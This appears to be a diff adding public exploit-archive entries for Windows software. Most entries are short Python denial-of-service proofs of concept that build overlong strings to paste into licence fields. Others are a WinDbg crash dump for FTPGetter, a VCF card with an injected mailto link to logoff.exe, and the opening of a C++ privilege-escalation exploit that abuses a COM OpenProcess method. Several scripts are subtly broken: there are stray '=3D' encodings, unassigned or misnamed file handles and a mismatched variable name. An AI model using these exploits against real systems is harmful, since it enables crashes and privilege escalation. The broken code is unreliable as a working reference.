5.Paste the characters in the field 'Name' and click on 'Ok'
6.BlueAuditor Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47859.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install ShareAlarmPro
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.ShareAlarmPro Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47860.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install NetShareWatcher
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.NetShareWatcher Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47861.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install Dnss
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.Dnss Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

28
exploits/windows/dos/47862.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
# Date: 2020-05-01
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
# Exploit Author: Achilles
# Tested Version: 3.1.1
# Tested on: Windows 7 x64
# 1.- Run python code :TextCrawler.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open TextCrawler Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 6000
try:
open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

33
exploits/windows/dos/47863.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install RemShutdown
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.RemShutdown Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47864.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.Backup Key Recovery Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47865.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install RemShutdown
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.RemShutdown Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47866.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install NBMonitor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.NBMonitor Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

63
exploits/windows/dos/47867.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC)
# Date: 2020-01-06
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
# Exploit Author: Gokkul
# Tested Version: v1.5.4
# Tested on: Windows 7 x64
# Software Description:
# Office Product Key Finder is offline product key finder software and allows to recover and
# find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010,
# Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers.
# 1.- Download and install Office Product Key Finder
# 2.- Run python code : Office Product Key Finder.py
#!/usr/bin/env python
DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
myfile=open('CRASHER.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")
# 3.- Open CRASHER.txt and copy content to clipboard
# 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code'
# 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key'
# 6.- click 'OK' you will see a crash.

33
exploits/windows/dos/47868.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotFTP
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotFTP Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47869.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotMSN
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotMSN Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47870.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotIM
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotIM Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

153
exploits/windows/dos/47871.txt Normal file
View file

@ -0,0 +1,153 @@
# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://www.ftpgetter.com/
# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
# Version: v.5.97.0.223
# Tested on: Windows 7
# CVE : N/A
==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================
The FTPGetter Professional v.5.97.0.223 FTP client suffers from a
NULL pointer dereference vulnerability via the program not properly
handling user input when setting the field "Run program" under
profile properties, it triggers when executing the profile.
==================================================================
DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183
==================================================================
...
...
==================================================================
WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
==================================================================
(b84.e88): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe -
FTPGetter!Xtermforminitialization$qqrv+0x202d74:
00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll -
Failed calling InternetOpenUrl, GLE=12007
FAULTING_IP:
FTPGetter!Xtermforminitialization$qqrv+202d74
00855994 8b5004 mov edx,dword ptr [eax+4]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00000004
Attempt to read from address 00000004
FAULTING_THREAD: 00000e88
PROCESS_NAME: FTPGetter.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 00000004
READ_ADDRESS: 00000004
FOLLOWUP_IP:
FTPGetter!Xtermforminitialization$qqrv+202d74
00855994 8b5004 mov edx,dword ptr [eax+4]
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE
DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE
LAST_CONTROL_TRANSFER: from 00812591 to 00855994
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: FTPGetter
IMAGE_NAME: FTPGetter.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb
FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv
BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1
Followup: MachineOwner
---------
NULL pointer
FOLLOWUP_IP:
REDftp!Xtermforminitialization$qqrv+202d74
00855994 8b5004 mov edx,dword ptr [eax+4]
Stepping into and running
eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
REDftp!GetFTPValidationW+0x6e842:
004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=????????
==================================================================
CVE-2020-5183 is a NULL pointer dereference vulnerability
==================================================================

26
exploits/windows/dos/47873.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
# Date: 2020-01-05
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link: https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.1.3
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Duplicate Cleaner Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 6000
try:
f.open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

93
exploits/windows/dos/47878.txt Normal file
View file

@ -0,0 +1,93 @@
# Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC)
# Date: 2020-01-04
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.microsoft.com
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
A VCF file is a standard file format for storing contact information for a person or business.
Microsoft Outlook supports the vCard and vCalendar features.
These are a powerful new approach to electronic Personal Data Interchange (PDI).
[Vulnerability Type]
Mailto Link Denial Of Service
[CVE Reference]
N/A
[Security Issue]
Windows VCF cards do not properly sanitize email addresses allowing for HTML injection.
A corrupt VCF card can cause all the users currently opened files and applications to be closed
and their session to be terminated without requiring any accompanying attacker supplied code.
This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then
kill all users applications and also log the target off their computer, if the VCF card is opened in
using Windows Contacts and the link is clicked.
The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args.
This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs
like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file.
Note, this exploit requires user interaction.
[Exploit/POC]
"VCF_DoS.py"
dirty_vcf=(
'BEGIN:VCARD\n'
'VERSION:4.0\n'
'FN:Session Terminate PoC - ApparitionSec\n'
'EMAIL:<a href="logoff">DoS@microsoft.com</a>\n'
'END:VCARD')
f=open("DoS.vcf", "w")
f.write(dirty_vcf)
f.close()
print "VCF Denial Of Service card created!"
print "By hyp3rlinx"
[POC Video URL]
https://www.youtube.com/watch?v=P4OGN7pZLSg
[Network Access]
Local
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: January 2, 2020
MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information
to exploit another user remotely without the use of social engineering... As such, this thread is being closed"
: January 3, 2020
January 4, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

24
exploits/windows/local/47852.txt Normal file
View file

@ -0,0 +1,24 @@
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-01-05
#Vendor Homepage : http://webcompanion.com/
#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
#Tested on OS: Windows 10
#Analyze PoC :
==============
C:\Users\ZwX>sc qc WCAssistantService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: WCAssistantService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WC Assistant
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

270
exploits/windows/local/47880.cc Normal file
View file

@ -0,0 +1,270 @@
// Axel '0vercl0k' Souchet - December 28 2019
// References:
// - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun
// - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object
// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp
// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp
#include <windows.h>
#include <cstdint>
#include <atlbase.h>
// 54E14197-88B0-442F-B9A3-86837061E2FB
// .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h ; Data1
// .rdata:0000000000014108 dw 88B0h ; Data2
// .rdata:0000000000014108 dw 442Fh ; Data3
// .rdata:0000000000014108 db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4
const GUID CLSID_CoreShellComServerRegistrar = {
0x54e14197, 0x88b0, 0x442f, {
0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb
}};
// 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7
// .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h ; Data1
// .rdata:00000000000140B8 dw 77F9h ; Data2
// .rdata:00000000000140B8 dw 4AFEh ; Data3
// .rdata:00000000000140B8 db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4
MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7")
ICoreShellComServerRegistrar : public IUnknown {
// 0:015> dqs 00007ff8`3fe526e8
// [...]
// 00007ff8`3fe52730 00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface
// 00007ff8`3fe52738 00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef
// 00007ff8`3fe52740 00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release
// 00007ff8`3fe52748 00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer
// 00007ff8`3fe52750 00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer
// 00007ff8`3fe52758 00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle
// 00007ff8`3fe52760 00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess
virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0;
virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0;
virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0;
virtual HRESULT STDMETHODCALLTYPE OpenProcess(
const uint32_t DesiredAccess,
const bool InheritHandle,
const uint32_t ArbitraryPid,
const uint32_t TargetProcessId,
HANDLE *ProcessHandle
) = 0;
};
struct Marshalled_t {
uint32_t Meow;
uint32_t ObjRefType;
GUID IfaceId;
uint32_t Flags;
uint32_t References;
uint64_t Oxid;
uint64_t Oid;
union {
uint64_t IfacePointerIdLow;
struct {
uint64_t _Dummy1 : 32;
uint64_t ServerPid : 16;
};
};
uint64_t IfacePointerIdHigh;
};
int main() {
//
// Initialize COM.
//
HRESULT Hr = CoInitialize(nullptr);
if(FAILED(Hr)) {
printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back.");
return EXIT_FAILURE;
}
//
// Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`.
//
CComPtr<ICoreShellComServerRegistrar> ComServerRegistrar;
